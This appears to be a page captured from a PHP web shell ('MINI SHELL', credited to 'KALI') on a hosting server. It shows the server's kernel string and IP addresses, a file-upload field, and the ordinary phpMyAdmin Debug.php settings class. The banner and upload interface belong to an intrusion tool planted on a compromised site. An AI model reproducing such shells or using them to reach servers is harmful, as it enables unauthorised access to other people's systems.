~ K    A     L    I ~
UNAME : Linux web65.extendcp.co.uk 4.18.0-553.56.1.el8_10.x86_64 #1 SMP Tue Jun 10 05:00:59 EDT 2025 x86_64
SERVER IP : 10.0.187.65 -________- CLIENT IP : 216.73.216.230
PATH :/home/phpmyadmin-www/libraries/classes/Config/Settings/
UP FILE :
MINI SHELL D ZAB '
Current File : /home/phpmyadmin-www/libraries/classes/Config/Settings/Debug.php
<?php

declare(strict_types=1);

namespace PhpMyAdmin\Config\Settings;

/**
 * @psalm-immutable
 */
final class Debug
{
    /**
     * Output executed queries and their execution times.
     *
     * @var bool
     */
    public $sql;

    /**
     * Log executed queries and their execution times to syslog.
     *
     * @var bool
     */
    public $sqllog;

    /**
     * Enable to let server present itself as demo server.
     *
     * @var bool
     */
    public $demo;

    /**
     * Enable Simple two-factor authentication.
     *
     * @var bool
     */
    public $simple2fa;

    /**
     * @param mixed[] $debug
     */
    public function __construct(array $debug = [])
    {
        $this->sql = $this->setSql($debug);
        $this->sqllog = $this->setSqlLog($debug);
        $this->demo = $this->setDemo($debug);
        $this->simple2fa = $this->setSimple2fa($debug);
    }

    /**
     * @param mixed[] $debug
     */
    private function setSql(array $debug): bool
    {
        return isset($debug['sql']) && $debug['sql'];
    }

    /**
     * @param mixed[] $debug
     */
    private function setSqlLog(array $debug): bool
    {
        return isset($debug['sqllog']) && $debug['sqllog'];
    }

    /**
     * @param mixed[] $debug
     */
    private function setDemo(array $debug): bool
    {
        return isset($debug['demo']) && $debug['demo'];
    }

    /**
     * @param mixed[] $debug
     */
    private function setSimple2fa(array $debug): bool
    {
        return isset($debug['simple2fa']) && $debug['simple2fa'];
    }
}
Coded by KALI :v Greetz to DR HARD ../ kali.zbi@hotmail.com